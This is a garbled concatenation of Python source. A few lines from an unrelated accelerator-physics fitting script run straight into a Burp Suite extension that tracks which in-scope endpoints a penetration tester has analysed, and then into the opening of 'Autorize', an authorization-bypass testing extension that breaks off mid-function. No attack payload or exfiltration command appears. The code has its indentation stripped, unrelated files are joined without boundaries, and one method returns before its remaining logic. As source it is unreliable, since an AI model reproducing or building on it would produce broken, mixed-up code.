final_twiss_params_holder.setParams(1,alphaY, betaY, emittY)
final_twiss_params_holder.setParams(2,alphaZ, betaZ, emittZ)
init_and_fit_params_controller.finalTwiss_table.getModel().fireTableDataChanged()
init_and_fit_params_controller.fit_iter_left_text.setValue(0.)
scorer.setUpLastNode(false)
scorer.calculateDiff2()
class BurpExtender(IBurpExtender, ITab, IHttpListener,
IMessageEditorController, AbstractTableModel,
IContextMenuFactory, IExtensionStateListener):
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
# keep a reference to our callbacks object
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("Burp Scope Monitor Experimental")
self.GLOBAL_HANDLER_ANALYZED = False
self.GLOBAL_HANDLER = False
self.STATUS = False
self.AUTOSAVE_REQUESTS = 10
self.AUTOSAVE_TIMEOUT = 600 # 10 minutes should be fine
self.CONFIG_INSCOPE = True
self.BAD_EXTENSIONS_DEFAULT = [
'.gif', '.png', '.js', '.woff', '.woff2', '.jpeg', '.jpg', '.css',
'.ico', '.m3u8', '.ts', '.svg'
]
self.BAD_MIMES_DEFAULT = [
'gif', 'script', 'jpeg', 'jpg', 'png', 'video', 'mp2t'
]
self.BAD_EXTENSIONS = self.BAD_EXTENSIONS_DEFAULT
self.BAD_MIMES = self.BAD_MIMES_DEFAULT
# create the log and a lock on which to synchronize when adding log entries
self._currentlyDisplayedItem = None
self.SELECTED_MODEL_ROW = 0
self.SELECTED_VIEW_ROW = 0
self._log = ArrayList()
self._fullLog = ArrayList()
self._lock = Lock()
self._lockFile = Lock()
# main split pane
self._parentPane = JTabbedPane()
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
##### config pane
self._config = JTabbedPane()
config = JPanel()
iexport = JPanel()
#config.setLayout(BorderLayout())
config.setLayout(None)
iexport.setLayout(None)
# config radio button
X_BASE = 40
Y_OFFSET = 5
Y_OPTION = 200
Y_OPTION_SPACING = 20
Y_CHECKMARK_SPACING = 20
self.showAllButton = JRadioButton(SHOW_ALL_BUTTON_LABEL, True)
self.showNewButton = JRadioButton(SHOW_NEW_BUTTON_LABEL, False)
self.showTestedButton = JRadioButton(SHOW_TEST_BUTTON_LABEL, False)
self.showAllButton.setBounds(40, 60 + Y_OFFSET, 400, 30)
self.showNewButton.setBounds(40, 80 + Y_OFFSET, 400, 30)
self.showTestedButton.setBounds(40, 100 + Y_OFFSET, 400, 30)
#self.showNewButton = JRadioButton(SHOW_NEW_BUTTON_LABEL, False)
#self.showTestedButton = JRadioButton(SHOW_TEST_BUTTON_LABEL, False)
self.showAllButton.addActionListener(self.handleRadioConfig)
self.showNewButton.addActionListener(self.handleRadioConfig)
self.showTestedButton.addActionListener(self.handleRadioConfig)
self.clearButton = JButton("Clear")
self.clearButton.addActionListener(self.handleClearButton)
self.clearButton.setBounds(40, 20, 100, 30)
self.startButton = JButton(MONITOR_ON_LABEL)
self.startButton.addActionListener(self.handleStartButton)
self.startButton.setBounds(150, 20, 200, 30)
self.badExtensionsLabel = JLabel("Ignore extensions:")
self.badExtensionsLabel.setBounds(X_BASE, 150, 200, 30)
self.badExtensionsText = JTextArea("")
self.loadBadExtensions()
self.badExtensionsText.setBounds(X_BASE, 175, 310, 30)
self.badExtensionsButton = JButton("Save")
self.badExtensionsButton.addActionListener(
self.handleBadExtensionsButton)
self.badExtensionsButton.setBounds(355, 175, 70, 30)
self.badExtensionsDefaultButton = JButton("Load Defaults")
self.badExtensionsDefaultButton.addActionListener(
self.handleBadExtensionsDefaultButton)
self.badExtensionsDefaultButton.setBounds(430, 175, 120, 30)
self.badMimesLabel = JLabel("Ignore mime types:")
self.badMimesLabel.setBounds(X_BASE, 220, 200, 30)
self.badMimesText = JTextArea("")
self.loadBadMimes()
self.badMimesText.setBounds(X_BASE, 245, 310, 30)
self.badMimesButton = JButton("Save")
self.badMimesButton.addActionListener(self.handleBadMimesButton)
self.badMimesButton.setBounds(355, 245, 70, 30)
self.badMimesDefaultButton = JButton("Load Defaults")
self.badMimesDefaultButton.addActionListener(
self.handleBadMimesDefaultButton)
self.badMimesDefaultButton.setBounds(430, 245, 120, 30)
self.otherLabel = JLabel("Other:")
self.otherLabel.setBounds(40, 300, 120, 30)
self.otherLabel2 = JLabel("Other:")
self.otherLabel2.setBounds(X_BASE, Y_OPTION, 120, 30)
self.autoSaveOption = JCheckBox("Auto save periodically")
self.autoSaveOption.setSelected(True)
self.autoSaveOption.addActionListener(self.handleAutoSaveOption)
self.autoSaveOption.setBounds(X_BASE, Y_OPTION + Y_CHECKMARK_SPACING,
420, 30)
self.repeaterOptionButton = JCheckBox(
"Repeater request automatically marks as analyzed")
self.repeaterOptionButton.setSelected(True)
self.repeaterOptionButton.addActionListener(
self.handleRepeaterOptionButton)
self.repeaterOptionButton.setBounds(50, 330, 420, 30)
self.scopeOptionButton = JCheckBox("Follow Burp Target In Scope rules")
self.scopeOptionButton.setSelected(True)
self.scopeOptionButton.addActionListener(self.handleScopeOptionButton)
self.scopeOptionButton.setBounds(50, 350, 420, 30)
self.startOptionButton = JCheckBox("Autostart Scope Monitor")
self.startOptionButton.setSelected(True)
self.startOptionButton.addActionListener(self.handleStartOption)
self.startOptionButton.setBounds(50, 350 + Y_OPTION_SPACING, 420, 30)
self.markTestedRequestsProxy = JCheckBox(
"Color request in Proxy tab if analyzed")
self.markTestedRequestsProxy.setSelected(True)
self.markTestedRequestsProxy.addActionListener(
self.handleTestedRequestsProxy)
self.markTestedRequestsProxy.setBounds(50, 350 + Y_OPTION_SPACING * 2,
420, 30)
self.markNotTestedRequestsProxy = JCheckBox(
"Color request in Proxy tab if NOT analyzed")
self.markNotTestedRequestsProxy.setSelected(True)
self.markNotTestedRequestsProxy.addActionListener(
self.handleNotTestedRequestsProxy)
self.markNotTestedRequestsProxy.setBounds(50,
350 + Y_OPTION_SPACING * 3,
420, 30)
self.saveButton = JButton("Save now")
self.saveButton.addActionListener(self.handleSaveButton)
self.saveButton.setBounds(X_BASE + 320, 95, 90, 30)
self.loadButton = JButton("Load now")
self.loadButton.addActionListener(self.handleLoadButton)
self.loadButton.setBounds(X_BASE + 420, 95, 90, 30)
self.selectPath = JButton("Select path")
self.selectPath.addActionListener(self.selectExportFile)
self.selectPath.setBounds(X_BASE + 530, 60, 120, 30)
self.selectPathText = JTextArea("")
self.selectPathText.setBounds(X_BASE, 60, 510, 30)
self.selectPathLabel = JLabel("State file:")
self.selectPathLabel.setBounds(X_BASE, 30, 200, 30)
bGroup = ButtonGroup()
bGroup.add(self.showAllButton)
bGroup.add(self.showNewButton)
bGroup.add(self.showTestedButton)
config.add(self.clearButton)
config.add(self.startButton)
config.add(self.startOptionButton)
config.add(self.showAllButton)
config.add(self.showNewButton)
config.add(self.showTestedButton)
config.add(self.badExtensionsButton)
config.add(self.badExtensionsText)
config.add(self.badExtensionsLabel)
config.add(self.badMimesButton)
config.add(self.badMimesText)
config.add(self.badMimesLabel)
config.add(self.badExtensionsDefaultButton)
config.add(self.badMimesDefaultButton)
config.add(self.otherLabel)
config.add(self.repeaterOptionButton)
config.add(self.scopeOptionButton)
config.add(self.markTestedRequestsProxy)
config.add(self.markNotTestedRequestsProxy)
iexport.add(self.saveButton)
iexport.add(self.loadButton)
iexport.add(self.selectPath)
iexport.add(self.selectPathText)
iexport.add(self.selectPathLabel)
iexport.add(self.otherLabel2)
iexport.add(self.autoSaveOption)
self._config.addTab("General", config)
self._config.addTab("Import/Export", iexport)
##### end config pane
self._parentPane.addTab("Monitor", self._splitpane)
self._parentPane.addTab("Config", self._config)
# table of log entries
self.logTable = Table(self)
#self.logTable.setDefaultRenderer(self.logTable.getColumnClass(0), ColoredTableCellRenderer(self))
self.logTable.setAutoCreateRowSorter(True)
self.logTable.setRowSelectionAllowed(True)
renderer = ColoredTableCellRenderer(self)
#column = TableColumn(0, 190, renderer, None)
print 'Initiating... '
# this could be improved by fetching initial dimensions
self.logTable.getColumn("URL").setPreferredWidth(720) # noscope
self.logTable.getColumn("URL").setResizable(True)
self.logTable.getColumn("Checked").setCellRenderer(renderer)
self.logTable.getColumn("Checked").setPreferredWidth(80)
self.logTable.getColumn("Checked").setMaxWidth(80)
self.logTable.getColumn("Method").setPreferredWidth(120)
#self.logTable.getColumn("Method").setMaxWidth(120)
self.logTable.getColumn("Method").setResizable(True)
self.logTable.getColumn("Time").setPreferredWidth(120) # noscope
self.logTable.getColumn("Time").setResizable(True)
scrollPane = JScrollPane(self.logTable)
self._splitpane.setLeftComponent(scrollPane)
# tabs with request/response viewers
tabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
tabs.addTab("Request", self._requestViewer.getComponent())
tabs.addTab("Response", self._responseViewer.getComponent())
self._splitpane.setRightComponent(tabs)
## Row sorter shit
#self._tableRowSorterAutoProxyAutoAction = CustomTableRowSorter(self.logTable.getModel())
#self.logTable.setRowSorter(self._tableRowSorterAutoProxyAutoAction)
markAnalyzedButton = JMenuItem("Mark Requests as Analyzed")
markAnalyzedButton.addActionListener(markRequestsHandler(self, True))
markNotAnalyzedButton = JMenuItem("Mark Requests as NOT Analyzed")
markNotAnalyzedButton.addActionListener(
markRequestsHandler(self, False))
sendRequestMenu = JMenuItem("Send Request to Repeater")
sendRequestMenu.addActionListener(sendRequestRepeater(self))
deleteRequestMenu = JMenuItem("Delete request")
deleteRequestMenu.addActionListener(deleteRequestHandler(self))
self.menu = JPopupMenu("Popup")
self.menu.add(markAnalyzedButton)
self.menu.add(markNotAnalyzedButton)
self.menu.add(sendRequestMenu)
self.menu.add(deleteRequestMenu)
# customize our UI components
callbacks.customizeUiComponent(self._parentPane)
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(self._config)
callbacks.customizeUiComponent(config)
callbacks.customizeUiComponent(self.logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(tabs)
callbacks.registerContextMenuFactory(self)
callbacks.registerExtensionStateListener(self)
callbacks.registerScannerCheck(passiveScanner(self))
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
self.loadConfigs()
print "Loaded!"
print "Experimental import state.. "
self.importState("")
self.SC = sched.scheduler(time.time, time.sleep)
self.SCC = self.SC.enter(10, 1, self.autoSave, (self.SC, ))
self.SC.run()
return
##### CUSTOM CODE #####
def loadConfigs(self):
if self._callbacks.loadExtensionSetting("CONFIG_AUTOSTART") == "False":
self.startOptionButton.setSelected(False)
self.startOrStop(None, False)
else:
self.startOptionButton.setSelected(True)
self.startOrStop(None, True)
if self._callbacks.loadExtensionSetting("exportFile") != "":
self.selectPathText.setText(
self._callbacks.loadExtensionSetting("exportFile"))
if self._callbacks.loadExtensionSetting("CONFIG_REPEATER") == "True":
self.repeaterOptionButton.setSelected(True)
else:
self.repeaterOptionButton.setSelected(False)
if self._callbacks.loadExtensionSetting("CONFIG_INSCOPE") == "True":
self.scopeOptionButton.setSelected(True)
else:
self.scopeOptionButton.setSelected(False)
if self._callbacks.loadExtensionSetting("CONFIG_AUTOSAVE") == "True":
self.autoSaveOption.setSelected(True)
else:
self.autoSaveOption.setSelected(False)
if self._callbacks.loadExtensionSetting(
"CONFIG_HIGHLIGHT_TESTED") == "True":
self.markTestedRequestsProxy.setSelected(True)
else:
self.markTestedRequestsProxy.setSelected(False)
if self._callbacks.loadExtensionSetting(
"CONFIG_HIGHLIGHT_NOT_TESTED") == "True":
self.markNotTestedRequestsProxy.setSelected(True)
else:
self.markNotTestedRequestsProxy.setSelected(False)
return
def selectExportFile(self, event):
parentFrame = JFrame()
fileChooser = JFileChooser()
fileChooser.setDialogTitle("Specify file to save state")
fileChooser.setFileSelectionMode(JFileChooser.FILES_ONLY)
userSelection = fileChooser.showOpenDialog(parentFrame)
if (userSelection == JFileChooser.APPROVE_OPTION):
fileLoad = fileChooser.getSelectedFile()
filename = fileLoad.getAbsolutePath()
self.selectPathText.setText(filename)
print 'Filename selected:' + filename
self._callbacks.saveExtensionSetting("exportFile", filename)
return
def extensionUnloaded(self):
print 'extension unloading.. '
print 'canceling scheduler.. '
map(self.SC.cancel, self.SC.queue)
return
def loadBadExtensions(self):
bad = self._callbacks.loadExtensionSetting("badExtensions")
if bad:
self.badExtensionsText.setText(bad)
# transform text to array
bad = bad.replace(" ", "")
self.BAD_EXTENSIONS = bad.split(",")
else:
print 'no bad extension saved, reverting'
self.badExtensionsText.setText(", ".join(self.BAD_EXTENSIONS))
def loadBadMimes(self):
bad = self._callbacks.loadExtensionSetting("badMimes")
if bad:
self.badMimesText.setText(bad)
bad = bad.replace(" ", "")
self.BAD_MIMES = bad.split(",")
else:
print 'no bad mimes saved, reverting'
self.badMimesText.setText(", ".join(self.BAD_MIMES))
## GLOBAL CONTEXT CODE ##
def createMenuItems(self, invocation):
responses = invocation.getSelectedMessages()
if responses > 0:
ret = LinkedList()
analyzedMenuItem = JMenuItem("Mark as analyzed")
notAnalyzedMenuItem = JMenuItem("Mark as NOT analyzed")
for response in responses:
analyzedMenuItem.addActionListener(
handleMenuItems(self, response, "analyzed"))
notAnalyzedMenuItem.addActionListener(
handleMenuItems(self, response, "not"))
ret.add(analyzedMenuItem)
ret.add(notAnalyzedMenuItem)
return ret
def getEndpoint(self, requestResponse):
url_ = str(self._helpers.analyzeRequest(requestResponse).getUrl())
o = urlparse(url_)
url = o.scheme + "://" + o.netloc + o.path
#print "Url3: " + url
return url
def getMethod(self, requestResponse):
return self._helpers.analyzeRequest(requestResponse).getMethod()
##### CUSTOM CODE #####
def handleTestedRequestsProxy(self, event):
self._callbacks.saveExtensionSetting(
"CONFIG_HIGHLIGHT_TESTED",
str(self.markTestedRequestsProxy.isSelected()))
return
def handleNotTestedRequestsProxy(self, event):
self._callbacks.saveExtensionSetting(
"CONFIG_HIGHLIGHT_NOT_TESTED",
str(self.markNotTestedRequestsProxy.isSelected()))
return
def handleStartOption(self, event):
self._callbacks.saveExtensionSetting(
"CONFIG_AUTOSTART", str(self.startOptionButton.isSelected()))
#print 'saving autostart: ' + str(self.startOptionButton.isSelected())
return
def startOrStop(self, event, autoStart):
if (self.startButton.getText() == MONITOR_OFF_LABEL) or autoStart:
self.startButton.setText(MONITOR_ON_LABEL)
self.startButton.setBackground(GREEN_COLOR)
self.STATUS = True
else:
self.startButton.setText(MONITOR_OFF_LABEL)
self.startButton.setBackground(RED_COLOR)
self.STATUS = False
def handleStartButton(self, event):
self.startOrStop(event, False)
def handleAutoSaveOption(self, event):
self._callbacks.saveExtensionSetting(
"CONFIG_AUTOSAVE", str(self.autoSaveOption.isSelected()))
return
def handleSaveButton(self, event):
self.exportState("")
def handleLoadButton(self, event):
self.importState("")
def handleRepeaterOptionButton(self, event):
self._callbacks.saveExtensionSetting(
"CONFIG_REPEATER", str(self.repeaterOptionButton.isSelected()))
return
def handleScopeOptionButton(self, event):
self.CONFIG_INSCOPE = self.scopeOptionButton.isSelected()
self._callbacks.saveExtensionSetting("CONFIG_INSCOPE",
str(self.CONFIG_INSCOPE))
return
def handleBadExtensionsButton(self, event):
#print "before BAD array: "
print self.BAD_EXTENSIONS
extensions = self.badExtensionsText.getText()
self._callbacks.saveExtensionSetting("badExtensions", extensions)
print 'New extensions blocked: ' + extensions
bad = extensions.replace(" ", "")
self.BAD_EXTENSIONS = bad.split(",")
#print "BAD array: "
#print self.BAD_EXTENSIONS
def handleBadExtensionsDefaultButton(self, event):
self.BAD_EXTENSIONS = self.BAD_EXTENSIONS_DEFAULT
self.badExtensionsText.setText(", ".join(self.BAD_EXTENSIONS))
self._callbacks.saveExtensionSetting("badExtensions",
", ".join(self.BAD_EXTENSIONS))
return
def handleBadMimesDefaultButton(self, event):
self.BAD_MIMES = self.BAD_MIMES_DEFAULT
self.badMimesText.setText(", ".join(self.BAD_MIMES))
self._callbacks.saveExtensionSetting("badExtensions",
", ".join(self.BAD_MIMES))
return
def handleBadMimesButton(self, event):
mimes = self.badMimesText.getText()
self._callbacks.saveExtensionSetting("badMimes", mimes)
print 'New mimes blocked: ' + mimes
bad = mimes.replace(" ", "")
self.BAD_MIMES = bad.split(",")
def handleClearButton(self, event):
print 'Clearing table'
self._lock.acquire()
self._log = ArrayList()
self._fullLog = ArrayList()
self._lock.release()
return
def handleRadioConfig(self, event):
#print ' radio button clicked '
#print event.getActionCommand()
self._lock.acquire()
if event.getActionCommand() == SHOW_ALL_BUTTON_LABEL:
print "Showing all"
self._log = self._fullLog
elif event.getActionCommand() == SHOW_NEW_BUTTON_LABEL:
print "Showing new scope only"
tmpLog = ArrayList()
for item in self._fullLog:
if not (item._analyzed):
tmpLog.add(item)
self._log = tmpLog
elif event.getActionCommand() == SHOW_TEST_BUTTON_LABEL:
print "Showing tested scope only"
tmpLog = ArrayList()
for item in self._fullLog:
if item._analyzed:
tmpLog.add(item)
self._log = tmpLog
else:
print "unrecognized radio label"
self.fireTableDataChanged()
#self._tableRowSorterAutoProxyAutoAction.toggleSortOrder(1)
#self.toggleSortOrder(2)
#self.logTable.toggleSortOrder(2)
# refresh table?
self._lock.release()
#
# implement ITab
#
def getTabCaption(self):
return "Scope Monitor"
def getUiComponent(self):
return self._parentPane
#
# implement IHttpListener
#
def markAnalyzed(self, messageIsRequest, state):
#print "markAnalyzed..."
self._lock.acquire()
url = self.getEndpoint(messageIsRequest)
for item in self._log:
if url == item._url:
item._analyzed = state
self._lock.release()
return
self._lock.release()
return
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
# only process requests
#print "processing httpMessage.."
#print messageIsRequest
print "processHttpMessage toolFlag: " + str(toolFlag)
#print " -- " + str(self._callbacks.getToolName(toolFlag)) + " -- "
if not (self.STATUS):
return
#print "global handler status: (true): " + str(self.GLOBAL_HANDLER)
#print "(processHTTP) messageIsRequest"
#print messageIsRequest
isFromPassiveScan = False
if toolFlag == 1234:
print "1 processHttpMessage: processing passiveScan item"
isFromPassiveScan = True
if toolFlag != 1234:
if messageIsRequest and not (self.GLOBAL_HANDLER):
print "1.5 processHttpMessage droping message"
return
if self.scopeOptionButton.isSelected():
url = self._helpers.analyzeRequest(messageInfo).getUrl()
if not self._callbacks.isInScope(url):
#print 'Url not in scope, skipping.. '
return
#print "still processing httpMessage.., request came from: " + self._callbacks.getToolName(toolFlag)
if toolFlag == 1234:
print "2 processHttpMessage: processing passiveScan item; setting toolFlag to proxy (4)"
toolFlag = 4
#toolFlag = 4
if ((self._callbacks.getToolName(toolFlag) != "Repeater")
and (self._callbacks.getToolName(toolFlag) != "Proxy")
and (self._callbacks.getToolName(toolFlag) != "Target")):
#print 'Aborting processHTTP, request came from: ' + str(self._callbacks.getToolName(toolFlag))
print "Droping request from " + str(
self._callbacks.getToolName(toolFlag))
return
#print "---> still processing from tool: " + str(self._callbacks.getToolName(toolFlag))
url = self.getEndpoint(messageInfo)
method = self.getMethod(messageInfo)
#print "(processHTTP) before extensions check: " + url
for extension in self.BAD_EXTENSIONS:
if url.endswith(extension):
return
if messageInfo.getResponse():
mime = self._helpers.analyzeResponse(
messageInfo.getResponse()).getStatedMimeType()
#print 'Declared mime:' + mime
mime = mime.lower()
if mime in self.BAD_MIMES:
#print 'Bad mime:' + mime
return
#print "[httpMessage] before lock"
# create a new log entry with the message details
self._lock.acquire()
row = self._log.size()
for item in self._log:
if url == item._url:
if method == self._helpers.analyzeRequest(
item._requestResponse).getMethod():
#print 'duplicate URL+method, skipping.. '
self._lock.release()
# has it been analyzed?
analyzed = False
if self._callbacks.getToolName(toolFlag) == "Repeater":
if self.repeaterOptionButton.isSelected():
analyzed = True
#print "[httpMessage] setting analyzed as true"
if self.GLOBAL_HANDLER_ANALYZED:
analyzed = True
item._analyzed = analyzed
self.paintItems(messageInfo, item)
return
#print "[httpMessage] before setComment"
if not (isFromPassiveScan):
messageInfo.setComment(SCOPE_MONITOR_COMMENT)
# reached here, must be new entry
analyzed = False
if self._callbacks.getToolName(toolFlag) == "Repeater":
if self.repeaterOptionButton.isSelected():
analyzed = True
#print "[httpMessage] setting analyzed as true"
if self.GLOBAL_HANDLER_ANALYZED:
analyzed = True
#print "[httpMessage] after comment"
#print 'in httpmessage, response:'
#print self._helpers.analyzeResponse(messageInfo.getResponse())
date = datetime.datetime.fromtimestamp(
time.time()).strftime('%H:%M:%S %d %b %Y')
entry = LogEntry(toolFlag,
self._callbacks.saveBuffersToTempFiles(messageInfo),
url, analyzed, date, method)
#print "toolFlag: " + str(toolFlag)
#print "(processHTTP) Adding URL: " + url
self._log.add(entry)
self._fullLog.add(entry)
self.fireTableRowsInserted(row, row)
self.paintItems(messageInfo, entry)
self._lock.release()
#print "columnCoun:" + str(self.logTable.getColumnCount())
#
# extend AbstractTableModel
#
def paintItems(self, messageInfo, item):
'''
print "in paint Items"
print "mark color is: (true)" + str(self.markTestedRequestsProxy.isSelected())
print "global handler analyzed: :" + str(self.GLOBAL_HANDLER_ANALYZED)
print "item analyzed should be the same ^^:" + str(item._analyzed)
'''
if (self.markTestedRequestsProxy.isSelected()) and (
item._analyzed and self.GLOBAL_HANDLER_ANALYZED):
messageInfo.setHighlight("green")
return
if self.markNotTestedRequestsProxy.isSelected() and not (
item._analyzed):
messageInfo.setHighlight("red")
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 4
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "Checked"
if columnIndex == 1:
return "URL"
if columnIndex == 2:
return "Method"
if columnIndex == 3:
return "Time"
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
#self.setBackground(Color.GREEN)
return self.returnEntry(rowIndex, columnIndex, logEntry)
if self.showNewButton.isSelected() and not (logEntry._analyzed):
return self.returnEntry(rowIndex, columnIndex, logEntry)
elif self.showTestedButton.isSelected() and logEntry._analyzed:
return self.returnEntry(rowIndex, columnIndex, logEntry)
elif self.showAllButton.isSelected():
return self.returnEntry(rowIndex, columnIndex, logEntry)
def returnEntry(self, rowIndex, columnIndex, entry):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
if logEntry._analyzed:
return "True"
else:
return "False"
if columnIndex == 1:
return self._helpers.urlDecode(logEntry._url)
if columnIndex == 2:
return logEntry._method
if columnIndex == 3:
return logEntry._date
# return date
return ""
#
# implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
#print 'getRequest called'
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
#print 'getResponse called: '
print self._currentlyDisplayedItem.getResponse()
return self._currentlyDisplayedItem.getResponse()
def exportRequest(self, entity, filename):
line = str(entity._analyzed) + ","
line = line + self._helpers.urlEncode(entity._url).replace(
",", "%2c") + "," # URL is encoded so we should be good
line = line + entity._method + ","
line = line + entity._date
line = line + '\n'
#print 'Exporting: "' + line + '"'
return line
def exportUrlEncode(self, url):
return self._helpers.urlEncode(url).replace(",", "%2c")
def exportState(self, filename):
filename = self.selectPathText.getText()
if filename == "":
filename = self._callbacks.loadExtensionSetting("exportFile")
print 'Empty filename, skipping export'
return
else:
self._callbacks.saveExtensionSetting("exportFile", filename)
print 'saving state to: ' + filename
savedUrls = []
self._lockFile.acquire()
try:
with open(filename, 'r') as fr:
savedEntries = fr.read().splitlines()
savedUrls = []
for savedEntry in savedEntries:
savedUrls.append(savedEntry.split(",")[1])
#print "savedUrls len: " + str(len(savedUrls))
#print "savedUrls:"
#print savedUrls
fr.close()
except IOError:
print "Autosaving skipped as file doesn't exist yet"
with open(filename, 'a+') as f:
for item in self._log:
if self.exportUrlEncode(item._url) not in savedUrls:
line = self.exportRequest(item, "xx")
f.write(line)
f.close()
self._lockFile.release()
return
def importState(self, filename):
filename = self.selectPathText.getText()
if filename == "":
filename = self._callbacks.loadExtensionSetting("exportFile")
print 'Empty filename, skipping import'
return
else:
self._callbacks.saveExtensionSetting("exportFile", filename)
print 'loading state from: ' + filename
self.STATUS = False
self._lockFile.acquire()
with open(filename, 'r') as f:
proxy = self._callbacks.getProxyHistory()
proxyItems = []
for item in proxy:
if item.getComment():
if SCOPE_MONITOR_COMMENT in item.getComment():
proxyItems.append(item)
print 'proxyItems has: ' + str(len(proxyItems))
# TODO - if no proxy items, sraight to import
lines = f.read().splitlines()
for line in lines:
data = line.split(",")
url = data[1]
url = self._helpers.urlDecode(url)
#print 'Saving: ' + url
if not self._callbacks.isInScope(URL(url)):
print '-- imported url not in scope, skipping.. '
continue
analyzed = False
if data[0] == "True":
analyzed = True
#print '.. simulating url search.. '
requestResponse = None
for request in proxyItems:
if url == self.getEndpoint(request):
#print 'Match found when importing for url: ' + url
requestResponse = request
break
self._log.add(
LogEntry("", requestResponse, url, analyzed, data[3],
data[2]))
self._lockFile.release()
print 'finished loading.. '
#print 'size: ' + str(self._log.size())
self.fireTableDataChanged()
if self.startButton.getText() == MONITOR_ON_LABEL:
self.STATUS = True
return
def autoSave(self, sc):
#print 'autosaving.. lol what'
if self.autoSaveOption.isSelected():
print "[" + self.getTime(
) + "] autosaving to " + self._callbacks.loadExtensionSetting(
"exportFile")
self.exportState("")
self.SC.enter(self.AUTOSAVE_TIMEOUT, 1, self.autoSave, (self.SC, ))
return
def getTime(self):
date = datetime.datetime.fromtimestamp(
time.time()).strftime('%H:%M:%S')
return date
class BurpExtender(IBurpExtender, ITab, IHttpListener, IMessageEditorController, AbstractTableModel, IContextMenuFactory):
def registerExtenderCallbacks(self, callbacks):
# keep a reference to our callbacks object
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("Autorize")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
self._enfocementStatuses = ["Authorization bypass!","Authorization enforced??? (please configure enforcement detector)","Authorization enforced!"]
self.intercept = 0
self.initInterceptionFilters()
self.initEnforcementDetector()
self.initEnforcementDetectorUnauthorized()
self.initExport()
self.initConfigurationTab()
self.initTabs()
self.initCallbacks()
self.currentRequestNumber = 1
print "Thank you for installing Autorize v0.12 extension"
print "Created by Barak Tawily"
print "Contributors: Barak Tawily, Federico Dotta"
print "\nGithub:\nhttps://github.com/Quitten/Autorize"
return
def initExport(self):
#
## init enforcement detector tab
#
exportLType = JLabel("File Type:")
exportLType.setBounds(10, 10, 100, 30)
exportLES = JLabel("Enforcement Statuses:")
exportLES.setBounds(10, 50, 160, 30)
exportFileTypes = ["HTML","CSV"]
self.exportType = JComboBox(exportFileTypes)
self.exportType.setBounds(100, 10, 200, 30)
exportES = ["All Statuses", self._enfocementStatuses[0], self._enfocementStatuses[1], self._enfocementStatuses[2]]
self.exportES = JComboBox(exportES)
self.exportES.setBounds(100, 50, 200, 30)
exportLES = JLabel("Statuses:")
exportLES.setBounds(10, 50, 100, 30)
self.exportButton = JButton("Export",actionPerformed=self.export)
self.exportButton.setBounds(390, 25, 100, 30)
self.exportPnl = JPanel()
self.exportPnl.setLayout(None);
self.exportPnl.setBounds(0, 0, 1000, 1000);
self.exportPnl.add(exportLType)
self.exportPnl.add(self.exportType)
self.exportPnl.add(exportLES)
self.exportPnl.add(self.exportES)
self.exportPnl.add(self.exportButton)
def initEnforcementDetector(self):
#
## init enforcement detector tab
#
# These two variable appears to be unused...
self.EDFP = ArrayList()
self.EDCT = ArrayList()
EDLType = JLabel("Type:")
EDLType.setBounds(10, 10, 140, 30)
EDLContent = JLabel("Content:")
EDLContent.setBounds(10, 50, 140, 30)
EDLabelList = JLabel("Filter List:")
EDLabelList.setBounds(10, 165, 140, 30)
EDStrings = ["Headers (simple string): (enforced message headers contains)", "Headers (regex): (enforced messege headers contains)", "Body (simple string): (enforced messege body contains)", "Body (regex): (enforced messege body contains)", "Full request (simple string): (enforced messege contains)", "Full request (regex): (enforced messege contains)", "Content-Length: (constant Content-Length number of enforced response)"]
self.EDType = JComboBox(EDStrings)
self.EDType.setBounds(80, 10, 430, 30)
self.EDText = JTextArea("", 5, 30)
self.EDText.setBounds(80, 50, 300, 110)
self.EDModel = DefaultListModel();
self.EDList = JList(self.EDModel);
self.EDList.setBounds(80, 175, 300, 110)
self.EDList.setBorder(LineBorder(Color.BLACK))
self.EDAdd = JButton("Add filter",actionPerformed=self.addEDFilter)
self.EDAdd.setBounds(390, 85, 120, 30)
self.EDDel = JButton("Remove filter",actionPerformed=self.delEDFilter)
self.EDDel.setBounds(390, 210, 120, 30)
self.EDPnl = JPanel()
self.EDPnl.setLayout(None);
self.EDPnl.setBounds(0, 0, 1000, 1000);
self.EDPnl.add(EDLType)
self.EDPnl.add(self.EDType)
self.EDPnl.add(EDLContent)
self.EDPnl.add(self.EDText)
self.EDPnl.add(self.EDAdd)
self.EDPnl.add(self.EDDel)
self.EDPnl.add(EDLabelList)
self.EDPnl.add(self.EDList)
def initEnforcementDetectorUnauthorized(self):
#
## init enforcement detector tab
#
EDLType = JLabel("Type:")
EDLType.setBounds(10, 10, 140, 30)
EDLContent = JLabel("Content:")
EDLContent.setBounds(10, 50, 140, 30)
EDLabelList = JLabel("Filter List:")
EDLabelList.setBounds(10, 165, 140, 30)
EDStrings = ["Headers (simple string): (enforced message headers contains)", "Headers (regex): (enforced messege headers contains)", "Body (simple string): (enforced messege body contains)", "Body (regex): (enforced messege body contains)", "Full request (simple string): (enforced messege contains)", "Full request (regex): (enforced messege contains)", "Content-Length: (constant Content-Length number of enforced response)"]
self.EDTypeUnauth = JComboBox(EDStrings)
self.EDTypeUnauth.setBounds(80, 10, 430, 30)
self.EDTextUnauth = JTextArea("", 5, 30)
self.EDTextUnauth.setBounds(80, 50, 300, 110)
self.EDModelUnauth = DefaultListModel();
